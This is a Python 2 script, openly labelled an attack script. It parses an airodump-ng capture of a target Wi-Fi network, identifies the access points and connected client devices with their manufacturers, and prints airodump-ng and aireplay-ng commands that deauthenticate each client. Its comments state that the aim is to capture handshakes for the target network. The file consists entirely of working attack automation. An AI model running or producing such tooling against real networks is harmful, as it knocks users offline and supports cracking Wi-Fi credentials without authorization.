from lookup_hardware import lookup_hardware
import pandas as pd
import numpy as np

# Deauth Clients 
# Attack Script
#
# This script parses airodump information 
# for listening to a specific network/BSSID,
# and identifies the clients on that network.
# 
# It then uses these pieces to assemble
# calls to aireplay for deauth attacks.
# You can run these scripts in one window
# while you're running airodump in another,
# and you'll capture handshakes for the target.
# 
#
#

csvfile='/root/dumps/k2015-08-19/74_85_2A_71_D3_D8-02.csv'

with open(csvfile,'rb') as f:
    z = f.read()

parts = z.split('\r\n\r\n')

stations = parts[0]

clients = parts[1]

print "Found stations and clients. Done splitting file."
print ""



import sys
if sys.version_info[0] < 3:
    from StringIO import StringIO
else:
    from io import StringIO


# ---------------
# Now feed each part to a Pandas DataFrame

print "Feeding csv data to Pandas DataFrame."

stations_str = StringIO(stations)
clients_str  = StringIO(clients)

stations_df = pd.DataFrame.from_csv(stations_str)
clients_df  = pd.DataFrame.from_csv(clients_str)


# ----------
# ap 

print "* "*35
print "        ","Access Point: Summary"
print "* "*35
print ""

for ir,row in stations_df.iterrows():

    ap_mac = ir

    ap_name = row[' ESSID']
    ap_name = ap_name[1:]
    ap_sec = row[' Privacy']
    ap_pow = row[' Power']
    ap_ch = row[' channel']

    mac_prefix = ap_mac[0:8]
    ap_mfg = lookup_hardware(mac_prefix)

    if ap_name=='':
        ap_name="unlabeled"

    ######################
    # Print out some information
    print "="*40
    print "Name:",ap_name
    print "Channel:",ap_ch
    print "MAC:",ap_mac
    print "Manufacturer:",ap_mfg
    print "Encryption:",ap_sec
    print "Power:",ap_pow
    print ""

    # ##########################
    # # Print out an airodump command
    print "Listen to this network:"
    print "airodump-ng","-d",ap_mac,"-c",ap_ch,"-w","'"+ap_name+"'","wlan1"
    print ""



# ----------------
# clients

print "* "*35
print "        ","Sheep/Clients: Summary"
print "* "*35
print ""

for ir,row in clients_df.iterrows():

    client_mac = row.name
    client_pow = row[' Power']
    client_essids = row[' Probed ESSIDs']

    mac_prefix = client_mac[0:8]
    client_mfg = lookup_hardware(mac_prefix)

    ######################
    # Print out some information
    print "="*40
    print "Client MAC:",client_mac
    print "Manufacturer:",client_mfg
    print "Power:",client_pow
    print "Probed ESSIDs:",client_essids
    print ""


    # ##########################
    # # Attack mode
    print "Deauth attack network:"
    print "aireplay-ng","-0 1","-a",ap_mac,"-c",client_mac,"wlan2"
    print ""

